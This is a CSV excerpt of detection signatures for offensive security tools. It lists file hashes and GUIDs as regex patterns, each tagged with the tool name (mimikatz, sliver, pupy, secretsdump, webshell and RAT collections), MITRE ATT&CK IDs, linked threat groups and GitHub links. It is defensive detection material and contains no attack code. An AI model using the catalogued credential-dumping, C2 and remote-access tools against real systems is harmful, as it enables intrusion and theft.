"*299c708dd83186dda79639794e8ca637fe729b2bd2f6c5353bc5c52f64c7e29c*",".{0,1000}299c708dd83186dda79639794e8ca637fe729b2bd2f6c5353bc5c52f64c7e29c.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23703"
"*299c9eda11e70fdd9a0073ae0e45c6e2d8aee617eabd8ed6fb13adc8a890b674*",".{0,1000}299c9eda11e70fdd9a0073ae0e45c6e2d8aee617eabd8ed6fb13adc8a890b674.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#filehash","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","23704"
"*29a507e37ad10b3ed522b8a524fa2d8f99978f42f16bffb9872d855c53345ca9*",".{0,1000}29a507e37ad10b3ed522b8a524fa2d8f99978f42f16bffb9872d855c53345ca9.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23705"
"*29ab009420cb687d2c1ec6e7aa68faad1a62215b7a92e70aa3731639d5ca1a69*",".{0,1000}29ab009420cb687d2c1ec6e7aa68faad1a62215b7a92e70aa3731639d5ca1a69.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23706"
"*29aeb20a52144263d17c63c96b707a2d859aaae811acebd65d3ce605b26984a1*",".{0,1000}29aeb20a52144263d17c63c96b707a2d859aaae811acebd65d3ce605b26984a1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23707"
"*29b1014789a969ec7aafc64bd17de1483775e2199de791b622718bb11be69729*",".{0,1000}29b1014789a969ec7aafc64bd17de1483775e2199de791b622718bb11be69729.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23708"
"*29b4ba00c47acb9059e19dd1acd4c6e83dfbd0af2e4cf0447892de04c6d1e8e4*",".{0,1000}29b4ba00c47acb9059e19dd1acd4c6e83dfbd0af2e4cf0447892de04c6d1e8e4.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","23710"
"*29b6ac2ea4feac6530ab3f5401c99739ff8eea1f32f0a120fa971a9cef9bbfbb*",".{0,1000}29b6ac2ea4feac6530ab3f5401c99739ff8eea1f32f0a120fa971a9cef9bbfbb.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","23711"
"*29be39614ae599a05f63c98c9d0c357869318adf49136dbbbeb51f04ab1ff62b*",".{0,1000}29be39614ae599a05f63c98c9d0c357869318adf49136dbbbeb51f04ab1ff62b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23714"
"*29ca8dc96c56a1198bd34befa9fb5ba1571b24bf1f6f2f4c32eb55fbf47dc6ea*",".{0,1000}29ca8dc96c56a1198bd34befa9fb5ba1571b24bf1f6f2f4c32eb55fbf47dc6ea.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","23715"
"*29CBBC24-363F-42D7-B018-5EF068BA8777*",".{0,1000}29CBBC24\-363F\-42D7\-B018\-5EF068BA8777.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","#GUIDproject","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","23717"
"*29cf4b68c34663281bebc94f62c92282ca351839032140fcb2b0266d44a8bc84*",".{0,1000}29cf4b68c34663281bebc94f62c92282ca351839032140fcb2b0266d44a8bc84.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","23718"
"*29CFAA16-9277-4EFB-9E91-A7D11225160B*",".{0,1000}29CFAA16\-9277\-4EFB\-9E91\-A7D11225160B.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","#GUIDproject","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","23719"
"*29d30b556932d0657f14a0b290ec79d23f88d8454ca27151c8348ab7e4be9657*",".{0,1000}29d30b556932d0657f14a0b290ec79d23f88d8454ca27151c8348ab7e4be9657.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","#filehash","N/A","10","4","312","62","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z","23720"
"*29da8a2c4876a0767f27fc5197704648c3a19058bc05895760d094ed41925c50*",".{0,1000}29da8a2c4876a0767f27fc5197704648c3a19058bc05895760d094ed41925c50.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23723"
"*29df50927dfff1414f643367fcc9492dba40ebd2f518e1ec6cce25339ee73f6e*",".{0,1000}29df50927dfff1414f643367fcc9492dba40ebd2f518e1ec6cce25339ee73f6e.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","23724"
"*29eb65e949707d372888fa09a691afd2d186e9ca6d97a5a7e89867468b675760*",".{0,1000}29eb65e949707d372888fa09a691afd2d186e9ca6d97a5a7e89867468b675760.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","23726"
"*2a059074a33ed243a36891aea3adb60038f81401b3a9f0ec9282350e0450ec3a*",".{0,1000}2a059074a33ed243a36891aea3adb60038f81401b3a9f0ec9282350e0450ec3a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","23729"
"*2a0d512c0fbacaa2029dd11e588342e80bd47927a0fa7535c75714aed2404232*",".{0,1000}2a0d512c0fbacaa2029dd11e588342e80bd47927a0fa7535c75714aed2404232.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23730"
"*2a1482c944f5e27e23b23040a60c2dcebe263d1b3d071fbbea363707306733a6*",".{0,1000}2a1482c944f5e27e23b23040a60c2dcebe263d1b3d071fbbea363707306733a6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23731"
"*2a16d9cdb572f7860983402e56691cc4334bcc7c4f093528abe30bbcd8a2afd0*",".{0,1000}2a16d9cdb572f7860983402e56691cc4334bcc7c4f093528abe30bbcd8a2afd0.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","23732"
"*2a1db46df9455741f409b022318e2045f97095ea615400a71c99e413e9e5c9b9*",".{0,1000}2a1db46df9455741f409b022318e2045f97095ea615400a71c99e413e9e5c9b9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23734"
"*2a222cd3c05cdbf6db8c226743bbb46ce9e384c1f59e39072d60910b1099b80c*",".{0,1000}2a222cd3c05cdbf6db8c226743bbb46ce9e384c1f59e39072d60910b1099b80c.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","23735"
"*2a3035797a103e527b1645cb90fccf165b76deea5b1526d80f66e32f5082e0d0*",".{0,1000}2a3035797a103e527b1645cb90fccf165b76deea5b1526d80f66e32f5082e0d0.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#filehash","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","23736"
"*2a306de4565a13893b191df6e8d43b7570c0e3a3d9aa841d6d65cd843f66d220*",".{0,1000}2a306de4565a13893b191df6e8d43b7570c0e3a3d9aa841d6d65cd843f66d220.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23737"
"*2a3543146a8e544c425b5ffcb70dc00e0475e0c4de5bf8aae379ee04cf4d322a*",".{0,1000}2a3543146a8e544c425b5ffcb70dc00e0475e0c4de5bf8aae379ee04cf4d322a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23739"
"*2a363206ab10c7d679055b32bbd73782aff91263f9325e179a2f03f6bca0f55a*",".{0,1000}2a363206ab10c7d679055b32bbd73782aff91263f9325e179a2f03f6bca0f55a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23740"
"*2a46df8322062f52a20c78eb93d7b068b61037db2ce48edcb9f8beda43dd8ede*",".{0,1000}2a46df8322062f52a20c78eb93d7b068b61037db2ce48edcb9f8beda43dd8ede.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","#filehash","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","23742"
"*2a5afbf327864c6b682b15d893504d9e3757e83522ac32e848e69a5e496e1fce*",".{0,1000}2a5afbf327864c6b682b15d893504d9e3757e83522ac32e848e69a5e496e1fce.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23743"
"*2a707260991123cf39ed723eaff4bf99db683ad35f58ad43c75c8fe2a5e9a4e7*",".{0,1000}2a707260991123cf39ed723eaff4bf99db683ad35f58ad43c75c8fe2a5e9a4e7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23745"
"*2a74704d6eb53e9a97c063f182021c51b5f687882227902e020ac82f45ab1e4c*",".{0,1000}2a74704d6eb53e9a97c063f182021c51b5f687882227902e020ac82f45ab1e4c.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23746"
"*2a74704d6eb53e9a97c063f182021c51b5f687882227902e020ac82f45ab1e4c*",".{0,1000}2a74704d6eb53e9a97c063f182021c51b5f687882227902e020ac82f45ab1e4c.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23747"
"*2a7968aa8897afc8da0024530babe71fa7e6db8d31e5316a12c30e4221f198ef*",".{0,1000}2a7968aa8897afc8da0024530babe71fa7e6db8d31e5316a12c30e4221f198ef.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23750"
"*2a7c53ab30b10ad3b6c82d1f057a094ecd68975f7c81becd2ba1f9519e8cf340*",".{0,1000}2a7c53ab30b10ad3b6c82d1f057a094ecd68975f7c81becd2ba1f9519e8cf340.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23752"
"*2a83ad9a1a2be9e1d7e3ddda77b758d6914fa72d94d75924e4579867a1cfeaf4*",".{0,1000}2a83ad9a1a2be9e1d7e3ddda77b758d6914fa72d94d75924e4579867a1cfeaf4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23753"
"*2a8b77cd55cc43d79d9c4475cc9287360f6fd3dc47a07f83ff33853de1652f7d*",".{0,1000}2a8b77cd55cc43d79d9c4475cc9287360f6fd3dc47a07f83ff33853de1652f7d.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","23754"
"*2a90167209fbc5f0a2af9666eeeb1947c925efe72537e7bea4a384e8159777f1*",".{0,1000}2a90167209fbc5f0a2af9666eeeb1947c925efe72537e7bea4a384e8159777f1.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","23755"
"*2a95a39ae2f86f2479690a7b54ad9038be74c8b95e4a978f4975f7c8f0d028d9*",".{0,1000}2a95a39ae2f86f2479690a7b54ad9038be74c8b95e4a978f4975f7c8f0d028d9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23756"
"*2a9cd5021cf8f43304a9ecc91759b534aad0efff59d9da57ca666c8b5f8ce819*",".{0,1000}2a9cd5021cf8f43304a9ecc91759b534aad0efff59d9da57ca666c8b5f8ce819.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","23757"
"*2aa4f05b7acf28440538a3295d015e9dbbb919730d225e6b2f1051e328f6b3c4*",".{0,1000}2aa4f05b7acf28440538a3295d015e9dbbb919730d225e6b2f1051e328f6b3c4.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","23758"
"*2aa583cf99e14b810027715517aa588c0261a8df80fcb8018c29d2ff5d8777f3*",".{0,1000}2aa583cf99e14b810027715517aa588c0261a8df80fcb8018c29d2ff5d8777f3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23759"
"*2ab55fdad5aa04a7a7a68b1284869347a1589891476cb03089c9106cff8e2d38*",".{0,1000}2ab55fdad5aa04a7a7a68b1284869347a1589891476cb03089c9106cff8e2d38.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23760"
